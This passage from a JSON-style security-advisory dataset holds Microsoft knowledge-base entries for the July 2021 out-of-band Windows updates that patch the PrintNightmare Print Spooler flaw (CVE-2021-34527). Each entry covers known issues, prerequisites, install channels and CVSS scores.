\nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog ](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004948>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004948](<https://download.microsoft.com/download/4/a/8/4a80157a-c3e5-45b0-ab2d-9e6001b8ecd2/5004948.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004948 (OS Build 14393.4470) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004948", "href": "https://support.microsoft.com/en-us/help/5004948", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:15", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003661](<https://support.microsoft.com/help/5003661>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010.](<https://support.microsoft.com/help/5005010>)\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004955>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004955](<https://download.microsoft.com/download/c/8/8/c88a24bd-9f1c-4cf1-8e26-cb65bd2ef4c7/5004955.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004955 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004955", "href": "https://support.microsoft.com/en-us/help/5004955", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010[.](<https://support.microsoft.com/help/5005010>)\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004960>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004960](<https://download.microsoft.com/download/b/6/5/b6562791-88a6-461f-a98d-366e9f7c194f/5004960.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 7, 2021\u2014KB5004960 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004960", "href": "https://support.microsoft.com/en-us/help/5004960", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:11", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see [KB5005010](<https://support.microsoft.com/help/5005010>).\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive the following error: \n \n\"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed **in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\n * If you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/obtaining-extended-security-updates-for-eligible-windows-devices/ba-p/1167091>) post. For information on the prerequisites, see the **How to get this update** section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5003636](<https://support.microsoft.com/help/5003636>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004951>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004951](<https://download.microsoft.com/download/e/b/5/eb523bca-d712-4df9-991a-c3ba662ee308/5004951.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004951 (Security-only update) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-01T07:00:00", "id": "KB5004951", "href": "https://support.microsoft.com/en-us/help/5004951", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:14", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003667](<https://support.microsoft.com/help/5003667>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive the following error:\"Cannot connect to <Server name>, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \"Failure to configure Windows updates. Reverting Changes. Do not turn off your computer\", and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \"STATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\". This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004953>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5004953](<https://download.microsoft.com/download/2/6/c/26ceb7c6-ee36-40d8-bd9c-a0cea2d48fdd/5004953.csv>).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-01T07:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004953 (Monthly Rollup) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 